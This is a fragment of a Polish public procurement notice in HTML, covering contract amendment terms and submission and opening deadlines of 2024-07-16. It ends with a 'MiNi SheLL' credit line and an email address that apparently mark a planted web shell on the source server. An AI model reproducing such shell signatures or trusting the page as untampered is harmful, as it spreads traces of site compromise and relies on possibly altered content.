Zamawiającego postanowienia umowy zawiera załączony do SWZ wzór umowy.<br/>2.	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy, <br/>w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy zgodnie z warunkami podanymi we wzorze umowy.<br/>3.	Bez uszczerbku dla ust. 2 zmiana umowy może także nastąpić w przypadkach, o których mowa w art. 454 i 455 ustawy Pzp. Zmiany umowy zostały określone w projekcie umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-16 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">5. Wykonawca składa Ofertę o dopuszczenie do udziału w postępowaniu, dalej „wniosek” za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na portalu e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-16 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-14</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com